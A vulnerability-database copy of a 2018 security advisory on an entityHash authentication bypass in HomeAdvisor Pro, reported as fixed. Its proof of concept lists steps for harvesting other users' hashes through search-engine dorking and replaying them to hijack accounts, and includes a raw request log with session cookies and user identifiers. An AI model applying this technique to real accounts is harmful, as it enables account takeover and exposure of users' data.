Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
vulnerlabVulnerability-Lab [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabVULNERLAB:1557
HistoryJul 19, 2018 - 12:00 a.m.

HomeAdvisor Pro - EntityHash Auth Bypass Vulnerability

2018-07-1900:00:00
Vulnerability-Lab [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
www.vulnerability-lab.com
584
JSON
Document Title:
===============
HomeAdvisor Pro - EntityHash Auth Bypass Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1557

Video: https://www.vulnerability-lab.com/get_content.php?id=1929


Release Date:
=============
2018-07-19


Vulnerability Laboratory ID (VL-ID):
====================================
1557


Common Vulnerability Scoring System:
====================================
9.6


Vulnerability Class:
====================
Authentication Bypass


Current Estimated Price:
========================
5.000€ - 10.000€


Product & Service Introduction:
===============================
Over 30 million homeowners have trusted HomeAdvisor to help them find quality pros with the expertise to turn their home improvement 
dreams into reality. It's just one of the reasons you can depend on us to bring you highly targeted prospects that will grow 
your business. Getting started is easy. Sign up today and let us help you grow your business, one homeowner at a time.

(Copy of the Vendor Homepage: https://pro.homeadvisor.com/how-it-works/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an auth bypass session vulnerability in the official HomeAdvisor online service web-application.


Vulnerability Disclosure Timeline:
==================================
2018-07-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Bug Bounty Program


Technical Details & Description:
================================
A entityHash auth bypass session vulnerability has been discovered in the official HomeAdvisor Pro online service web-application.
The auth bypass session vulnerability allows remote attackers to gain access to another user secure profile information and data.

The vulnerability is located in the entityHash= parameter of homeadvisory pro. When an attacker changes the value entityHash= to 
the victim entityHash= you will login without confirm secure. By usage of google or other crawlers we are able to capture the 
entityHash value of homeadvisor pro users. The same vulnerability typus was disclosed first by our team to the microsoft bug 
bounty yammer program in 2013. The vulnerability is that there is no second auth approval for the entityhash which can results 
in a takeover of another account by usage of an auth bypass in connection with the hash. The hash is not secure approved and 
thus results in an auth bypass by usage of the entityhash only. Another trick to bypass is that the attacker uses the user id 
that is attached to the request next to the entityhash.

The security risk of the auth bypass vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 9.6.
Exploitation of the critical auth bypass web vulnerability requires no privileged web-application user account or user interaction.
Successful exploitation of the vulnerabilities results in user account and accountsystem compromise by manipulation or infiltration.

Vulnerable Parameter(s):
[+] entityHash


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open https://pro.homeadvisor.com
2. Do search in google site:pro.homeadvisor.com/ entityHash=
3. Farm some entityHash values of clients
3. Change the entityHash= to the entityHash= of a random victim by intercepting the traffic or via http live tamper
4. Perform the request via GET method to the homeadvisor service application
Now, you will logged in with a valid session and the victims entityHash value
Note: When you change via tamper the value entityHash of the victim you will login with just change the value entityHash=


--- PoC Session Logs ---
Status: 301[Moved Permanently]
GET https://pro.homeadvisor.com/servlet/HomeServlet?entityHash=11928834_396bc39710bdad7504a4807feeef1817
Mime Type[application/x-unknown-content-type]
        Request Headers:
        Host[pro.homeadvisor.com]
        User-Agent[Mozilla/5.0 (X11; Linux i686; rv:39.0) Gecko/20100101 Firefox/39.0]
        Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
        Cookie[originatingSessionID="1337"; csacn=746971; csdcn=1437478941849; psacn=746971; psdcn=1437478121418; 
optimizelyEndUserId=oeu1429704431469r0.8701083976370677; v71=%5B%5B%27Referrers%27%2C%271437473444057%27%5D%2C%5B%27Type-In%27%2C%271437473599713%27%5D%2C%5B%27
Referrers%27%2C%271437476175935%27%5D%2C%5B%27Type-In%27%2C%271437476183081%27%5D%2C%5B%27Email%27%2C%271437476340853%27%5D%2C%5B%27Type-In%27%2C%27143747649728
9%27%5D%2C%5B%27Email%27%2C%271437477034239%27%5D%2C%5B%27Type-In%27%2C%271437477132544%27%5D%2C%5B%27Referrers%27%2C%271437477971178%27%5D%2C%5B%27Type-In%27%2
C%271437478182352%27%5D%5D; fsr.r=%7B%22d%22%3A90%2C%22i%22%3A%22d5e2305-49433661-607d-7166-b4aa3%22%2C%22e%22%3A1430309540199%7D; s_fid=26A640D6D01EEF1E-27AB9
4756408D960; s_dslv2=1437478802329; optimizelySegments=%7B%22192702441%22%3A%22ff%22%2C%22192663147%22%3A%22false%22%2C%22192690192%22%3A%22none%22%2C%22192644
497%22%3A%22referral%22%2C%223034470465%22%3A%22true%22%2C%223018270184%22%3A%22true%22%2C%223013960429%22%3A%22true%22%2C%222403180023%22%3A%22true%22%7D; opti
mizelyBuckets=%7B%222994180103%22%3A%222999960067%22%2C%223126860572%22%3A%223123860510%22%7D; __utma=65920055.2074902274.1429704432.1437473373.1437477940.6; __
utmz=65920055.1429704432.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); s_vi=[CS]v1|2A9BC79185011597-600001136000151A[CE]; s_gnr=1437
478802331-Repeat; s_vnum=1438383600051%26vn%3D3; _ivu=A3BF18A6-D7AF-4BDE-834F-C3FD2FDD2C99; __gads=ID=fe1944bfab77b958:T=1435889440:S=ALNI_MbHVWIV_urncurn-m_oEuak
LS1g9A; __utma=168469472.339370364.1435889637.1437473444.1437476340.5; __utmz=168469472.1437476340.5.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%2
0provided); __ar_v4=OBIU2LI5ZFELBJFDGHFF5S%3A20150702%3A167%7C4SFWD66ESVAFDCGDKRX43R%3A20150702%3A167%7C2LYJLG4RLJCKZCOW7TRWTE%3A20150702%3A167%7CGYZQKVMPWJBZBP4OC
B6CM4%3A20150720%3A193%7CIUECRTQC6ZC77PLZBQQ6ZP%3A20150720%3A193%7CKCYCVZHJ7FAAZBDQKGHHAY%3A20150720%3A193; _gig_llp=facebook; _gig_llu=Samir; __qca=P0-1342044628-1
435894942731; v72=%5B%5B%27EM-15727939%27%2C%2
71435895145385%27%5D%2C%5B%27EM-15727939%27%2C%271435895596636%27%5D%2C%5B%27EM-15727939%27%2C%271437476340855%27%5D%2C%5B%27EM-15727939%27%2C%271437477034240%27%5
D%5D; sess_log=1437478121418pwspr00841515EDC235E3F21DAE93527415D3E01; TS01a79be6=0109d29b8d01d791112555e8647b1ccf4bc0fa66ab89aa52622d0c4d77fcf08ea60e991c70e7cd768d1351
eeb37e5b4e0e9d4e8db7697a4b735723fbc02bd2224254679ec3748a5ffa6ee81654a
4445e9e46eed3ba316d22a832511a443958e63a0e84c217af9bde02e5ff2f0015161c4730fbdfb120ed37c0069f4e8e3b58a346499bb5ce; s_cc=true; s_eVar8=unknown; fpv=1; 
c_m=undefinedType-InType-In; s_e69=Type-In; s_evar46=5%3A30AM; s_evar47=Tuesday; s_evar48=Weekday; s_dslv2_s=More%20than%207%20days; s_gnr2=Repeat; s_invisit=true; 
s_visNum=3; s_ppv=31; v11=41.104.137.97; s_sq=%5B%5BB%5D%5D; fsr.s=%7B%22cp%22%3A%7B%22zipCode%22%3A%22%22%2C%22ActionName%22%3A%22%20
Spanish_Checkbox_32226_0113_spanchk%22%2C%22loggedIn%22%3A%22false%22%2C%22entryPage%22%3A%22%2FWEB-INF%2Fjsp%2Fsp%2Ferrorpages%2Ferror.jsp%22%2C%22sessionID%22%3A
%221437476975551pwspr050.homeadvisor.comC7A8DB62858CB2098E29BF24C48C092B.pwspr050-1%22%2C%22userID%22%3A%2211928834%22%2C%22affiliateID%22%3A%223843876%22%2C%22
categoryID%22%3A%220%22%2C%22SP%20Type%22%3A%22ProFinder%22%7D%2C%22v1%22%3A-2%2C%22v2%22%3A-2%2C%22rid%22%3A%22d5e2305-49374835-08a4-4b0c-b969e%22%2C%22to%22%3
A4.7%2C%22c%22%3A%22https%3A%2F%2Fpro.homeadvisor.com%2F%22%2C%22pv%22%3A100%2C%22lc%22%3A%7B%22d1%22%3A%7B%22v%22%3A6%2C%22s%22%3Atrue%7D%2C%22d0%22%3A%7B%22v%22
%3A80%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22f%22%3A1437478801866%2C%22sd%22%3A0%7D; __utmc=65920055; s_e17=event17; s_eVar55=11928834; s_spid=24662366; 
JSESSIONID=C7A8DB62858CB2098E29BF24C48C092B.pwspr050-1; aff_track=2|*|3843876|*|15727939; ServerID=503949504.20480.0000; TS014cf8c3=0109d29b8d523dbe082e522b290c477faaf9f27c2227b5a2d61bc9d1c4cf3585484177c0a2c1c1f1c8aec540b56ba70f0bff7c262464155a8619369b41c16001e8ea4934a70f9e98c52fea
a9056483832d5f64b768ba67c975bf71b8341d169a6e56a17d1aefaa18e4d99dfebe5143ddd7da16b5f48724d8ed0db03fd8a3d3d0936874e99316d598672952421e80372b1915bc2b9360524bbc178c584fb3981fba3262b50f; TS01a764fb=0109d29b8dfd5e5e7e4e41488c4639209211ebb0972c67fcc7542e553b2d46e07bb44971d154da4d10911ffda6566d508608c1223eefb105abbda02c6e5d5e38a49199ccf90c0dfb5abcdba0e
fa9b7246056f9ef59910ed8e57daa343c56497e2edfa46317fc1b82171e1fa666d4b4c5d18fe0daf57dfb7e0910e8371b3babc0612e9b3acc; __utmb=168469472.45.10.1437476340; 
__utmc=168469472; ctqc=0; __utmb=65920055.1.10.1437477940; __utmt=1]
        X-Forwarded-For[8.8.8.8]
        Connection[keep-alive]
        Response Headers:
        Location[https://pro.homeadvisor.com/]
        Connection[Keep-Alive]
        Set-Cookie[ServerID=503949504.20480.0000; 
	expires=; 
	path=/TS014cf8c3=0109d29b8d523dbe082e522b290c477faaf9f27c2227b5a2d61bc9d1c4cf3585484177c0a2c1c1f1c8aec540b56ba70f0bff7c262
	464155a8619369b41c16001e8ea4934a70f9e98c52feaa9056483832d5f64b768ba67c975bf71b8341d169a6e56a17d1aefaa18e4d99dfebe5143ddd7da16b5f48724d8ed0db03fd8a3d3d0936874e993
	16d598672952421e80372b1915bc2b9360524bbc178c584fb3981fba3262b50f; Path=/]


Reference(s):
https://pro.homeadvisor.com/
https://pro.homeadvisor.com/servlet/
https://pro.homeadvisor.com/servlet/HomeServlet
https://pro.homeadvisor.com/servlet/HomeServlet?entityHash


Solution - Fix & Patch:
=======================
The vulnerability has been reported to the manufacturer in 2016 Q3 - Q4 to the official bug bounty program. 
The security issue has been resolved by the homeadvisor developer team in 2017 Q3 - Q4. 
The disclosure process around the issue took about 8 month.


Security Risk:
==============
The security risk of the authentication bypass vulnerability in the entityHash is estimated as critical. 


Credits & Authors:
==================
Vulnerability-Lab [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™
JSON